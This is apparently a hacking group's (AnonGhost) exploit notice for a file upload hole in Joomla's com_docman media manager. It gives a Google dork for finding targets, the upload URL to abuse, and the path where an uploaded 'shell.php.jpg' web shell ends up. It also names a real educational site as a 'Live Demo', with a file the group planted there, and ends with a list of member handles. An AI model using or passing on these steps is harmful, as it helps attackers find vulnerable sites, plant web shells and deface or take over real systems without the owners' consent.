Joomla (com_docman) Media Manager File Upload Vulnerability

1. _____ ________.__ __
2. / _ \ ____ ____ ____ / _____/| |__ ____ _______/ |_
3. / /_\ \ / \ / _ \ / \/ \ ___| | \ / _ \/ ___/\ __\
4. / | \ | ( <_> ) | \ \_\ \ Y ( <_> )___ \ | |
5. \____|__ /___| /\____/|___| /\______ /___| /\____/____ > |__|
6. \/ \/ \/ \/ \/ \/
7. --------------------------------------------------
8. | https://twitter.com/ungku_nazmi |
9. | https://twitter.com/AnonGhostTeam |
10. --------------------------------------------------
11. Category web applications
12. Platform php
13. # Exploit Title: Joomla (com_docman) Media Manager File Upload Vulnerability
14. # Date: 05/11/2014
15. # Exploit Author: Donnazmi
16. # Tested on: Windows + Linux ++
17. # Google dork: inurl:index.php?option=com_docman
18. # SS : http://photouploads.com/images/comdocman.png
19.  
20. # Exploit
21.  
22. http://localhost/path/index.php/component/media/?view=images&tmpl=component&e_name=description&asset=com_docman&author=
23.  
24. # Shell path:
25. http://localhost/images/shell.php.jpg
26.  
27. Live Demo :
28. http://www.infotepsai.edu.co/index.php/component/media/?view=images&tmpl=component&e_name=description&asset=com_docman&author=
29.  
30. http://www.infotepsai.edu.co/images/AG.jpg
31.  
32. We are:Mauritania Attacker - Virusa Worm - Jih4d - AnonxoxTn - Tak Dikenal - Younes Lmaghribi - Mrlele - Mauritania K!ll3r - V0RT3X - Dr.SaM!M_008 - BillGate - RudeAt Localhost - Pr3d4T0r - X-Wanted - PhObia_PhOneyz - Mauritania InjeCtor - Donnazmi - Black Cracker - Extazy007 - M-c0d3r - DarkR00T - haxOr trojAn - Hamzah Uygun - Hellion - CoderSec - HusseiN98D - Mr.Ajword - xIdontknow - Mr HuNT3r - rummykhan - Hani Xavi - Samir inject0r - Noname-Hax0r - Mr-Domoz Ps - TRAFIQUANT - Ghostralia - Don Maverick RevCrew